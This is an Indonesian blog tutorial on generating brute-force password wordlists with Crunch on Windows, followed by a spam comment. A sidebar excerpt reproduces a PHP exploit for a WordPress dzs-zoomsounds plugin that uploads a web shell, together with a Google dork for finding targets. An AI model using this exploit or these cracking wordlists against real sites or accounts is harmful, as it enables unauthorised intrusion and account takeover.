Skip to main content

Tutorial Membuat Wordlist Menggunakan Crunch Di Windows


Hallo semuanya , back with me again #OepilCore , setelah sekian lama akhirnya saya mendapatkan inspirasi *anjaayyy kwkwkw bukan bukan , akhirnya saya mendapatkan suatu ilmu dari bertapa di gua mencari kitab suci , *berasa kera sakti gua* kwkwkw ,

oke, kali ini gua bakalan share , cara membuat wordlist menggunakan Crunch di windows kwkwkw, oke langsung to the point ajah , soalnya ini tutorial yang emang cukup singkat ya :3 ,


oke , untuk pertama , kalian bisa download filenya disini ,

 didalam file itu udah terdapat beberapa file seperti aircrack-ng ,serta yang lainnya , kalo kepo coba ajah deh cek biar asik kwkwkw XD

ini adalah isi file dari folder crunchnya ya ,

ini isi dari file crunchnya 


oke setelah kalian liat file yang ada dilamnya , silahkan 2x klik di cmd ,
disitu kan ada aplikasi cmd , kalian langsung buka ajah ,

terus masukan command sebagai berikut

crunch [min lenght] [max lenght] [character set] [options]

contoh nih ya teman teman

crunch 1 8 abcdefghijklmnopqrstuvwxyz > wordlist.txt

pengertian :
untuk > wordlist.txt ada tempat ouput kalian , jika kalian membuatnya didalam folder crunch , maka output kalian akan keluar disitu ,
 




nahh jika sudah selesai akan muncul file wordlist kalian , jika kalian membuat dengan character set yang lengkap , maka akan semakin besar outputnya ,

oke gimana tutorial kali ini ?
gua harap cukup membantu untuk kalian yang seneng main bruteforce kwkwkw ,
sekian untuk gua , karena ini udah malem gua harus ngejar artikel yang lain kwkwkw XD
maaf jika ada kesalahan kata dan yang lainnya , karena gua masih belajar , dan gua gak berhak untuk menggurui kalian , mari kita belajar bersama ya semuanya ^^

oke pay pay~
see you on next article bro :3

#OepilCore




Visit and follow :


FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line: http://line.me/ti/p/%40hjl8740i

Comments

  1. Tutorial Membuat Wordlist Menggunakan Crunch Di Windows >>>>> Download Now

    >>>>> Download Full

    Tutorial Membuat Wordlist Menggunakan Crunch Di Windows >>>>> Download LINK

    >>>>> Download Now

    Tutorial Membuat Wordlist Menggunakan Crunch Di Windows >>>>> Download Full

    >>>>> Download LINK Ec

    ReplyDelete

Post a Comment

Popular posts from this blog

WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload Vulnerability

################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http: //digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date : 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil = "dz.phtml" ; $ch = curl_init( "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS,          array ( 'file_field' => "@$evil" )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); echo "$postResult" ; ?> Shell Access : http: //127.0.0.1/wp-content/plugins/dzs-zoo...

How to Install CloudSim in Ubuntu (in 3 easy steps)

The contents of this DIY has been tested on Ubuntu 12.04 LTS x64 with CloudSim 3.0.3 beta and JDK8u11 x64. It should work similarly on other distros of Ubuntu and for different version of JDK as long as you use Java version 1.5 or newer. The text shown in RED in the DIY represents the values that will differ depending upon your JDK version and locations. CloudSim is a framework for modelling and simulating cloud computing infrastructure and services. In this DIY we will see how to install CloudSim in Windows easily and efficiently. A more detailed description, APIs and research papers related to CloudSim can be found here . Let us begin. Step 1: Setting up the Prerequisites 1. First of all we need to download the CloudSim and latest version of the Java Development Toolkit (JDK). CloudSim can be found here . 2. CloudSim requires a working Java installation. So, open up a terminal and run the following 1 sudo add-apt-repository ppa:webupd8team/java 2 sudo apt-get...

How To Add or Remove System Icons From The Kali Linux Desktop

When Kali Linux is started, there are always one or more system icons on the desktop. “Computer” is usually a default icon. However, some people might like to remove this icon and/or add other icons like the famous “Trash” icon. All the other tutorials will tell you to use the Linux, “gconfig-editor,” but Kali Linux does not have this system editor! I believe I am the only one who knows of a way to do this, so let me share my knowledge in this simple tutorial. Step one: Start and login to Kali Linux using your account or the “root” account. Step two: Open the main menu. Hover your mouse on “System Tools,” and click on “dconf Editor.” After a few seconds, the dconf Editor will open. Now all you have to do is browse to the correct category and set the options. Step three: When the dconf Editor window opens, click on the plus sign next to “org” (located in the left pane). Step four: Now click the plus sign next to “gnome.” Step five: Scroll down the list in the left pan...